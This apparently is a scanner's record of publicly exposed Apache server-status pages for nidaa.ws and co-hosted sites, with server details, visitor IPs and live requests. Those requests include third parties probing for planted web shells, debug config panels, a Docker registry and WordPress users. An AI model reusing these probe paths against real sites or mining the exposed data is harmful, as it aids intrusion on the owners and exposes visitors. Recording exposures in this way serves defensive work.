      5.13413126660.81.46180.49
      172.68.118.164http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-4218790/18/1680_
      4.9927212227010.00.22158.97
      172.71.114.164http/1.1qr.brunch.ws:443GET /storage/food_image/17162858593789_homemadeicedtea.jpg HTTP
      
      0-4218790/74/1663_
      4.9727555368680.01.50214.76
      172.71.114.138http/1.1qr.brunch.ws:443GET /storage/food_image/17096776666445_panacotta.webp HTTP/1.1
      
      0-4218790/27/1554_
      4.90279203310100.07.45160.13
      172.71.114.157http/1.1qr.brunch.ws:443GET /storage/food_image/17181922587231_penneaurorapasta.jpg HTT
      
      0-4218790/17/1390_
      4.9027923603260.00.96241.45
      172.71.114.202http/1.1qr.brunch.ws:443GET /storage/food_image/17085195308306_img2812ded58e2a4eb68e8e0
      
      0-4218790/23/1590_
      5.0916811843119460.00.21116.27
      34.224.98.241http/1.1jawad.com.sa:443GET /ads.txt HTTP/1.1
      
      0-4218790/75/1620_
      5.0719715608600.00.14123.74
      167.71.81.114http/1.1durratalkhamis.alnwisher.com:80GET /.DS_Store HTTP/1.1
      
      0-4218790/69/1551_
      4.9327762500510.00.20166.57
      172.71.114.30http/1.1qr.brunch.ws:443GET /storage/food_image/17096771367772_fajita.webp HTTP/1.1
      
      0-4218790/23/1553_
      5.10161147205640.03.32320.85
      34.224.98.241http/1.1jawad.com.sa:443GET /app-ads.txt HTTP/1.1
      
      0-4218790/68/1673_
      4.90279158479460.00.50156.16
      172.71.114.19http/1.1qr.brunch.ws:443GET /storage/food_image/17095846052706_croissantegg.jpg HTTP/1.
      
      1-4219070/76/1870_
      4.552721631208240.02.17319.78
      172.71.114.2http/1.1qr.brunch.ws:443GET /storage/food_image/17162859164039_redteacupcopy.jpg HTTP/1
      
      1-4219070/26/1631_
      4.5427243601870.01.03166.32
      172.71.114.152http/1.1qr.brunch.ws:443GET /storage/food_image/17096787609046_sweetmelon.webp HTTP/1.1
      
      1-4219070/74/1781_
      4.502765625139690.01.15167.03
      172.71.114.212http/1.1qr.brunch.ws:443GET /storage/food_image/17085205464112_img3b46483c816c4b6f958ec
      
      1-4219070/31/1463_
      4.77179633505590.00.1775.84
      52.167.144.217http/1.1jawad.com.sa:443GET /en/details/1004 HTTP/1.1
      
      1-4219070/20/1805_
      4.5727145611150.00.73115.77
      172.71.115.24http/1.1qr.brunch.ws:443GET /storage/food_image/17162864494425_frenchlatteaulatte.jpg H
      
      1-4219070/144/1733_
      4.7521223968100.00.19175.07
      162.158.233.73http/1.1adyar.com.sa:80GET /minik.php HTTP/1.1
      
      1-4219070/71/1988_
      4.5127665886860.01.28248.54
      172.71.114.104http/1.1qr.brunch.ws:4
      Found on 2024-06-16 10:45
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df77c1d753f

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 12-Jun-2024 15:37:12 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 11 hours 34 minutes 8 seconds
      Server load: 0.41 0.38 0.41
      Total accesses: 136338 - Total Traffic: 15.6 GB - Total Duration: 168467836
      CPU Usage: u238.12 s35.6 cu404.1 cs83.57 - .595% CPU load
      1.06 requests/sec - 127.8 kB/second - 120.1 kB/request - 1235.66 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ______________K_________________________________________K______R
      ___________________________K____________________________K_______
      _______R_________________W_____________________________________K
      ______________K_______________________________K___________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-256230/125/578_
      17.611860296190940.05.4359.93
      172.69.95.55http/1.1adyar.com.sa:443GET /login.action HTTP/1.1
      
      0-256230/114/477_
      17.5158531555540.07.4968.80
      134.35.146.238http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      0-256230/144/478_
      17.53510981281470.06.2833.16
      47.128.37.236http/1.1daris.live:443GET /login HTTP/1.1
      
      0-256230/134/521_
      17.5529131206710.03.5980.75
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1718195541.42982411384582519531
      
      0-256230/119/518_
      17.3839111432560.016.5188.58
      209.38.208.202http/1.1
      
      0-256230/153/441_
      17.4376846646770.07.0080.65
      176.224.119.13http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-256230/169/634_
      17.6119201258210.024.7457.38
      203.55.81.186http/1.1thenewjeddah.com:80GET /lufix.php HTTP/1.1
      
      0-256230/113/505_
      17.75240726510.09.2529.07
      40.77.167.77http/1.1albayan.edu.sa:80GET /web/35.html2 HTTP/1.1
      
      0-256230/176/519_
      17.6218321037280.011.0820.79
      172.69.179.57http/1.1adyar.com.sa:443GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-256230/211/522_
      17.6910002626150.021.0294.23
      203.55.81.186http/1.1thenewjeddah.com:80GET /wwr.php HTTP/1.1
      
      0-256230/132/542_
      17.707924504440.05.0276.81
      68.183.8.40http/1.1n.jawad.com.sa:443GET / HTTP/1.1
      
      0-256230/92/451_
      17.7537681766880.010.5270.70
      ac09637315.scan.leakix.orghttp/1.1alnwisher.com:443GET /server-status HTTP/1.1
      
      0-256230/139/432_
      17.355085921520.04.8841.53
      5.110.195.246http/1.1
      
      0-256230/107/438_
      17.368021849090.05.1059.64
      68.183.8.40http/1.1
      
      0-256231/142/555K
      17.750233142966.68.1939.92
      172.69.195.56http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-256230/159/503_
      17.5448111937910.039.6771.85
      47.128.37.236http/1.1daris.live:443GET /bin/admin/social%20icon/facebook.png HTTP/1.1
      
      0-256230/176/493_
      17.497115879840.07.6692.15
      176.224.119.13http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-256230/113/465_
      17.4375731111550.07.8476.89
      172.71.122.208http/1.1adyar.com.sa:80GET /radio.php HTTP/1.1
      
      0-256230/131/454_
      17.507061342217110.04.1015.59
      151.254.177.123http/1.1alezdhar.com:443GET /images/bg-6.png HTTP/1.1
      
      0-256230/159/430_
      17.5539922629100.07.6264.42
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-256230/137/377_
      17.497171811984650.030.3362.31
      176.224.119.13http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-256230/98/432_
      17.427931831626700.06.8546.01
      176.224.119.13http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-256230/225/472_
      17.236801831111670.04.7026.27
      176.224.119.13http/1.1
      
      0-256230/168/375_
      17.516270595290.013.5590.62
      114.119.151.152http/1.1albayan.edu.sa:80GET /imgweb/lib/m7ba-allah.pdf HTTP/1.1
      
      0-256230/104/468_
      17.4671842532490.011.3276.99
      176.224.119.13http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-2230910/174/726_
      23.307261821512770.092.84136.86
      176.224.119.13http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-2230910/189/560_
      23.18225391457140.072.9992.55
      213.74.15.14http/1.1
      
      1-2230910/183/651_
      23.6455913104250.09.9256.65
      91.121.168.91http/1.1trynidaa.com:443POST /wp-login.php HTTP/1.1
      
      1-2230910/225/529_
      23.277842462280370.021.9238.58
      66.249.76.225http/1.1akg.sa:443GET /?geriatric-421168-xbuui/2737188826 HTTP/1.1
      
      1-2230910/202/713_
      23.3370261061440.010.5239.02
      176.224.119.13http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-2230910/225/648_
      22.9681932550910.010.1033.36
      68.183.8.40http/1.1
      
      1-2230910/165/665_
      23.6522661145900.020.53105.59
      40.77.167.77http/1.1albayan.edu.sa:443GET /web/35.html2 HTTP/1.1
      
      1-2230910/224/559_
      23.451973032419970.057.0791.60
      54.36.149.39http/1.1sulaimaniya.edu.sa:443GET /%D9%86%D8%B3%D8%A8%D8%A9-%D8%A7%D9%84%D8%AA%D9%88%D8%B7%D9
      
      1-2230910/296/711_
      23.127452442067390.028.0755.25
      176.224.119.13http/1.1
      
      1-2230910/157/647_
      23.643701338810.029.09
      Found on 2024-06-12 12:37
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b909f359

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 12-Jun-2024 04:14:35 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 11 minutes 30 seconds
      Server load: 0.59 0.54 0.51
      Total accesses: 94670 - Total Traffic: 10.7 GB - Total Duration: 148180502
      CPU Usage: u43.22 s2.19 cu400.93 cs82.77 - .608% CPU load
      1.09 requests/sec - 128.2 kB/second - 118.0 kB/request - 1565.23 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 117 idle workers
      K_K_______________________K________________________KK___________
      ____________KW______________________............................
      ...............................................__K______________
      ________........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-2230901/3/420K
      0.36022942524066.60.4843.87
      172.68.195.131http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-2230900/3/351_
      0.361980518920.00.3061.10
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/wplink/about.php HTTP/1.1
      
      0-2230901/3/320K
      0.3601864310.80.2926.58
      172.70.250.129http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-2230900/2/372_
      0.1718768884910.00.2076.55
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/css/dist/list-reusable-blocks/about.php HTTP/1
      
      0-2230900/1/385_
      0.01122661168490.00.1070.82
      51.36.31.185http/1.1
      
      0-2230900/1/269_
      0.1716478423490.00.1031.05
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/css/dist/widgets/about.php HTTP/1.1
      
      0-2230900/11/447_
      0.2214090790050.00.2732.20
      95.219.218.81http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-2230900/2/379_
      0.2412847445690.00.1216.15
      37.43.31.109http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-2230900/4/328_
      0.201420805760.00.029.22
      95.219.218.81http/1.1albayan.edu.sa:443GET /e_sch/css/images/pause.png HTTP/1.1
      
      0-2230900/3/289_
      0.241273852390.00.2871.21
      37.43.31.109http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/YO0EQAvCa2ZH2wioRGOk6r
      
      0-2230900/3/397_
      0.231313374340.00.0462.54
      37.43.31.109http/1.1jawad.com.sa:443GET /public/front_resources/images/logo-footer.png HTTP/1.1
      
      0-2230900/2/334_
      0.261191361534330.00.0458.56
      172.70.174.188http/1.1support.daaris.com:443GET /index.php?language=french&rp=%2Fannouncements%2Fview%2Fold
      
      0-2230900/3/277_
      0.281151284398810.00.1336.06
      37.43.31.109http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-2230900/2/311_
      0.2811642827690.00.1351.57
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/dist/vendor/about.php HTTP/1.1
      
      0-2230900/4/392_
      0.2911213024140.00.4924.54
      37.43.31.109http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/koqJcPBiHc3M36bAnmU2i3
      
      0-2230900/2/332_
      0.29106371531440.00.2030.89
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/jquery/ui/about.php HTTP/1.1
      
      0-2230900/4/288_
      0.311023551290.00.3154.05
      37.43.31.109http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/SSQMRImNHumaxA5ZoZENHk
      
      0-2230900/3/339_
      0.311023931340.00.2326.68
      37.43.31.109http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/zcpaJXTvd7jgXny8ppVPAS
      
      0-2230900/2/312_
      0.3292662104930.00.2011.23
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/about.php HTTP/1.1
      
      0-2230900/2/253_
      0.348419592034200.03.5149.22
      114.119.134.80http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/momarsat.pdf HTTP/1.1
      
      0-2230900/2/228_
      0.357870491790.00.2031.67
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/directionality/about.php HT
      
      0-2230900/2/316_
      0.3571641331170.00.1938.88
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/hr/about.php HTTP/1.1
      
      0-2230900/2/230_
      0.355774943670.00.2020.94
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/lists/about.php HTTP/1.1
      
      0-2230900/2/185_
      0.354341364980.00.2076.31
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/textcolor/about.php HTTP/1.
      
      0-2230900/2/319_
      0.3532402140450.00.2062.48
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/wpeditimage/about.php HTTP/
      
      1-2230910/3/555_
      0.331786698130.00.3044.32
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/wptextpattern/about.php HTT
      
      1-2230911/3/374K
      0.33001060720.80.1119.67
      162.158.95.251http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-2230910/2/470_
      0.3229751165650.00.2046.93
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/js/tinymce/plugins/wpemoji/about.php HTTP/1.1
      
      1-2230910/3/307_
      0.33021710940.00.2616.93
      162.158.110.17http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-2230910/2/513_
      0.1218468846110.00.2028.70
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/css/dist/nux/about.php HTTP/1.1
      
      1-2230910/2/425_
      0.13169279925720.00.4723.72
      40.77.167.27http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D8%AC%D8%AF%D9%88%D9%84%20%D8%A
      
      1-2230910/1/501_
      0.1416375700240.00.1085.15
      94.156.64.75http/1.1trynidaa.com:80GET /wp-includes/customize/about.php HTTP/1.1
      
      1-2230910/1/3
      Found on 2024-06-12 01:14
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7fa78551f

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 20:10:08 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 16 hours 5 minutes 18 seconds
      Server load: 0.52 0.45 0.42
      Total accesses: 3003585 - Total Traffic: 404.9 GB - Total Duration: 3105257338
      CPU Usage: u810.16 s40.02 cu12247.9 cs2733.34 - .981% CPU load
      1.86 requests/sec - 263.2 kB/second - 141.3 kB/request - 1033.85 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 184 idle workers
      _____________K_K____________K_____K__W__________________________
      _____KK_____KK___________________________________K___________WWW
      WWWWWWWWWWWWWWWWWWWWWWK_K_______________________KK______________
      ________......................................W.................
      ............................................______K_____________
      __K__...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1077620/123/13966_
      13.63652113680510.04.401852.77
      172.71.114.192http/1.1qr.brunch.ws:443GET /storage/category_image/17098164893955_4.png HTTP/1.1
      
      0-1077620/101/12087_
      13.6965175919280.012.451783.17
      172.71.114.54http/1.1qr.brunch.ws:443GET /storage/food_image/17096782686057_agnnelo.webp HTTP/1.1
      
      0-1077620/71/12282_
      13.7127368089250.09.751697.03
      66.249.64.128http/1.1hawsab.me:80GET /?sim13210.html HTTP/1.1
      
      0-1077620/134/13045_
      13.63652403120090.08.581768.69
      172.71.114.13http/1.1qr.brunch.ws:443GET /storage/category_image/17098166111181_21.png HTTP/1.1
      
      0-1077620/77/12819_
      13.6865289242270.012.291651.72
      172.71.114.46http/1.1qr.brunch.ws:443GET /storage/food_image/17088476278699_img605b587494184586b4dfc
      
      0-1077620/163/12808_
      13.68652170185180.045.352068.91
      172.71.114.4http/1.1qr.brunch.ws:443GET /storage/food_image/17096768216014_ceasarwrap.webp HTTP/1.1
      
      0-1077620/104/12871_
      13.66653160073990.04.081883.16
      172.71.114.106http/1.1qr.brunch.ws:443GET /storage/food_image/17095847295383_shakshouka.jpg HTTP/1.1
      
      0-1077620/84/12230_
      13.67652227238930.04.261893.73
      172.71.114.21http/1.1qr.brunch.ws:443GET /storage/food_image/17088545191116_img8d07b226c7144f5b98ddb
      
      0-1077620/142/13527_
      13.6765291210930.07.381938.78
      172.71.115.24http/1.1qr.brunch.ws:443GET /storage/food_image/17088542122493_imgd175258f31ec4e8ea7551
      
      0-1077620/93/13211_
      13.6274581218710.04.851720.33
      172.71.114.90http/1.1qr.brunch.ws:443GET /storage/food_image/17096750977521_granola.webp HTTP/1.1
      
      0-1077620/127/12879_
      13.68654294103730.09.281453.03
      172.71.114.207http/1.1qr.brunch.ws:443GET /storage/food_image/17096759125693_pompgranet.webp HTTP/1.1
      
      0-1077620/187/13520_
      13.6465178302790.08.471413.59
      172.71.114.142http/1.1qr.brunch.ws:443GET /storage/food_image/17088572994283_img59928db1471841a8b3487
      
      0-1077620/114/12948_
      13.6465195031650.05.422026.32
      172.71.115.49http/1.1qr.brunch.ws:443GET /storage/food_image/17095842946075_trufellshakshouka.webp H
      
      0-1077621/102/12769K
      13.720180958440.95.671865.74
      172.71.155.40http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-1077620/135/12315_
      13.59878129542360.02.281335.40
      172.71.114.71http/1.1qr.brunch.ws:443GET /storage/food_image/17096750377622_labna.webp HTTP/1.1
      
      0-1077621/102/12887K
      13.722553614527.010.611511.18
      172.71.114.17http/1.1qr.brunch.ws:443GET /storage/food_image/17088490724908_img3ab766c4a52c4757b4346
      
      0-1077620/81/12715_
      13.608719345427160.066.531868.51
      172.71.114.161http/1.1qr.brunch.ws:443GET /assets/theme/images/gradient-bg.png HTTP/1.1
      
      0-1077620/109/13055_
      13.67651120431070.058.602100.29
      172.71.115.43http/1.1qr.brunch.ws:443GET /storage/food_image/17085196668732_imgd5955e49a1e64fdf9ea4f
      
      0-1077620/74/12761_
      13.6465271501090.02.071765.67
      172.71.114.91http/1.1qr.brunch.ws:443GET /storage/food_image/17095843937054_frenshomelet.webp HTTP/1
      
      0-1077620/62/13481_
      13.7060495007710.06.241671.76
      172.71.115.52http/1.1qr.brunch.ws:443GET /storage/food_image/17088550261100_img47415a6e0c4948078b83c
      
      0-1077620/108/12413_
      13.66652232427770.010.171708.66
      172.71.115.67http/1.1qr.brunch.ws:443GET /storage/food_image/17096758612967_zaatarflatbread.webp HTT
      
      0-1077620/124/13105_
      13.60873784990360.014.971607.02
      172.71.114.23http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-1077620/147/12574_
      13.6965176552150.04.541760.43
      172.71.114.27http/1.1qr.brunch.ws:443GET /storage/food_image/17096783202987_short.webp HTTP/1.1
      
      0-1077620/120/12749_
      13.64652201573990.08.182116.82
      172.71.115.57http/1.1qr.brunch.ws:443GET /storage/food_image/17095844876687_promodoro.jpg HTTP/1.1
      
      0-1077620/78/13107_
      13.6865291978800.09.711972.47
      172.71.114.65http/1.1qr.brunch.ws:443GET /storage/food_image/17088551827109_imgd9480b3e627b416e9afea
      
      1-10231750/4/12297_
      1.08652117816870.00.402016.11
      172.71.114.184http/1.1qr.brunch.ws:443GET /storage/food_image/17088470831086_img4a9dce7860224c159d1d9
      
      1-10231750/4/12686_
      1.0765296196240.028.062016.51
      172.71.114.20http/1.1qr.brunch.ws:443GET /storage/food_image/17096782595842_risottobeef.webp HTTP/1.
      
      1-10231750/3/13081_
      0.5577191471940.00.021849.46
      51.36.92.204http/1.1
      
      1-10231751/4/12506K
      1.1121131219720.80.031452.14
      172.69.135.45http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-10231750/6/12033_
      1.0965685799650.00.421633.62
      172.71.114.149http/1.1qr.brunch.ws:443GET /storage/food_image/17088542817700_imgc01ee519ff8f4d21ab979
      
      1-10231750/3/12860_
      1.0965281131430.00.011617.72
      172.71.114.70<
      Found on 2024-06-10 17:10
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df71251f32b

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 17:45:46 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 13 hours 40 minutes 56 seconds
      Server load: 0.43 0.43 0.42
      Total accesses: 2992274 - Total Traffic: 403.6 GB - Total Duration: 3093172541
      CPU Usage: u798.48 s37.76 cu12209.4 cs2726.63 - .983% CPU load
      1.86 requests/sec - 263.7 kB/second - 141.4 kB/request - 1033.72 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      _______K________________________________________K_______________
      ____WC_________________________K________________________K____WWW
      WWWWWWWWWWWWWWWWWWWWWW_____________________K_____________K______
      ________..................................................______
      ___________________.........................____________________
      ____K...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1077620/49/13892_
      3.40741113655890.01.921850.29
      37.106.150.234http/1.1
      
      0-1077620/22/12008_
      3.541462375454820.00.631771.35
      66.249.70.196http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-1077620/27/12238_
      3.50232167404630.00.751688.03
      51.253.134.22http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-1077620/24/12935_
      3.434031403055530.00.301760.41
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-1077620/19/12761_
      3.47255088781610.02.091641.52
      37.106.150.234http/1.1albayan.edu.sa:80GET /web/108.html2 HTTP/1.1
      
      0-1077620/28/12673_
      3.57652169105860.01.532025.09
      151.255.247.147http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-1077620/29/12796_
      3.434018159998820.00.771879.85
      172.69.225.185http/1.1qr.brunch.ws:443GET /assets/libs/jquery/jquery.min.js HTTP/1.1
      
      0-1077621/30/12176K
      3.5801227140970.82.921892.39
      162.158.86.143http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-1077620/26/13411_
      3.53203391033050.03.041934.44
      142.154.48.234http/1.1albayan.edu.sa:443GET /e_sch/css/adobe.com/default.advanced.css HTTP/1.1
      
      0-1077620/30/13148_
      3.44371081123540.00.931716.41
      185.216.70.252http/1.13dvi.com:80POST / HTTP/1.1
      
      0-1077620/12/12764_
      3.453492293628870.01.551445.29
      95.187.83.8http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AA%D9%81%D9%88%D9%82%20%D8%B1%D8%A7%D8%A8%
      
      0-1077620/33/13366_
      3.34238477940270.01.241406.36
      165.22.66.194http/1.1
      
      0-1077620/45/12879_
      3.586194972810.02.052022.95
      216.244.66.198http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
